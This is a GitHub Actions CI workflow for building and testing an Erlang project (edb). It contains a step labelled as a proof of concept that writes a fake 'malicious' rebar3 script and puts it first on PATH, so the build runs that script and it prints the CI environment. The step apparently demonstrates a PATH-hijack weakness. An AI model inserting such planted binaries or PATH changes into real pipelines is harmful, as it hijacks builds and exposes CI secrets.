name: CI

on:
  push:
    branches:
      - '*'
  pull_request:
    branches:
      - main
  release:
    types: [published]

jobs:
  build:

    strategy:
      matrix:
        include:
          - os: ubuntu-22.04
            otp-version: 27
            rebar3-version: 3.24.0
          - os: macos-latest
            otp-version: 27
            rebar3-version: 3.24.0

    runs-on: ${{ matrix.os }}

    steps:

      - name: Checkout repository
        uses: actions/checkout@v4
        with:
          submodules: true

      - name: Cache custom Erlang/OTP build
        uses: actions/cache@v4
        id: otp-cache
        with:
          path: otp-bin
          key: ${{ runner.os }}-otp-${{ hashFiles(format('{0}{1}', github.workspace, '/otp')) }}

      - name: Build and install custom Erlang/OTP
        working-directory: otp
        run: ./configure --prefix=$(pwd)/../otp-bin && make -j$(nproc) && make -j$(nproc) install
        if: steps.otp-cache.outputs.cache-hit != 'true'

      # ---- PoC step: create malicious binary ----
      - name: Create test binary for PATH hijack
        run: |
          mkdir -p otp-bin/bin
          echo '#!/bin/bash' > otp-bin/bin/rebar3
          echo 'echo "CI PATH HIJACK SUCCESS"' >> otp-bin/bin/rebar3
          echo 'env' >> otp-bin/bin/rebar3
          chmod +x otp-bin/bin/rebar3

      - name: Patch PATH
        run: echo "$(pwd)/otp-bin/bin" >> $GITHUB_PATH

      - name: Cache Hex packages
        uses: actions/cache@v4
        with:
          path: ~/.cache/rebar3/hex/hexpm/packages
          key: ${{ runner.os }}-hex-${{ hashFiles(format('{0}{1}', github.workspace, '/rebar.lock')) }}
          restore-keys: |
            ${{ runner.os }}-hex-

      - name: Checkout rebar3 repository
        uses: actions/checkout@v3
        with:
          repository: erlang/rebar3
          path: rebar3
          ref: ${{ matrix.rebar3-version }}

      - name: Bootstrap rebar3
        run: ./bootstrap
        working-directory: rebar3

      - name: Add rebar3 to PATH
        run: echo "$(pwd)/rebar3" >> $GITHUB_PATH

      # ---- Test execution ----
      - name: Test command execution
        run: rebar3 compile

      - name: Escriptize
        run: rebar3 escriptize

      - name: Test
        run: rebar3 ct

      - name: Format
        run: rebar3 fmt --check

      - name: XRef
        run: rebar3 xref

      - name: Create tarball
        run: tar -zcvf edb-${{ matrix.os }}-otp-${{ matrix.otp-version }}.tar.gz -C _build/default/bin edb

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: edb-${{ matrix.os }}-otp-${{ matrix.otp-version }}.tar.gz
          path: edb-${{ matrix.os }}-otp-${{ matrix.otp-version }}.tar.gz
